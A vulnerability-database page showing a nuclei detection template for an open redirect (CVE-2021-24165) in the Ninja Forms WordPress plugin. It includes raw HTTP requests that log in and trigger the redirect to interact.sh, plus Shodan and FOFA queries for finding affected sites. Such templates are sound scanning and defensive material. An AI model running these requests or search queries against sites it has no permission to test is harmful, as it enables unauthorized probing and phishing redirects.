Lucene search
K

WordPress Ninja Forms <3.4.34 - Open Redirect

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

WordPress Ninja Forms <3.4.34 open redirec

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24165
27 Apr 202309:58
circl
CNNVD
WordPress Ninja Forms Contact Form 输入验证错误漏洞
5 Apr 202100:00
cnnvd
CVE
CVE-2021-24165
5 Apr 202118:27
cve
Cvelist
CVE-2021-24165 Ninja Forms < 3.4.34 - Administrator Open Redirect
5 Apr 202118:27
cvelist
EUVD
EUVD-2021-11079
7 Oct 202500:30
euvd
NVD
CVE-2021-24165
5 Apr 202119:15
nvd
OSV
CVE-2021-24165
5 Apr 202119:15
osv
Prion
Open redirect
5 Apr 202119:15
prion
RedhatCVE
CVE-2021-24165
22 May 202521:05
redhatcve
Tenable Nessus
Ninja Forms Plugin for WordPress < 3.4.34 Multiple Vulnerabilities
3 Mar 202100:00
nessus
Rows per page
id: CVE-2021-24165

info:
  name: WordPress Ninja Forms <3.4.34 - Open Redirect
  author: dhiyaneshDk,daffainfo
  severity: medium
  description: |
    WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Update to the latest version of the Ninja Forms plugin (3.4.34 or higher) to fix the open redirect vulnerability.
  reference:
    - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
    - https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24165
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24165
    cwe-id: CWE-601
    epss-score: 0.01643
    epss-percentile: 0.73571
    cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: ninjaforms
    product: ninja_forms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/ninja-forms/
    fofa-query: body=/wp-content/plugins/ninja-forms/
    publicwww-query: /wp-content/plugins/ninja-forms/
  tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 302'
          - 'status_code_2 == 302'
          - "contains(header_2, 'Location: https://interact.sh?client_id=1')"
        condition: and
# digest: 4a0a004730450221008cc35d6496f703bdd98d8efe5f5b5df8fe588eca515846a24d6f9e8b6d2a6b99022047e725bef105bf3a91eed88f512afdb05ab5e4e4cfaaf210299423c203e9fe12:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25.8
CVSS 3.16.1
EPSS0.01643
32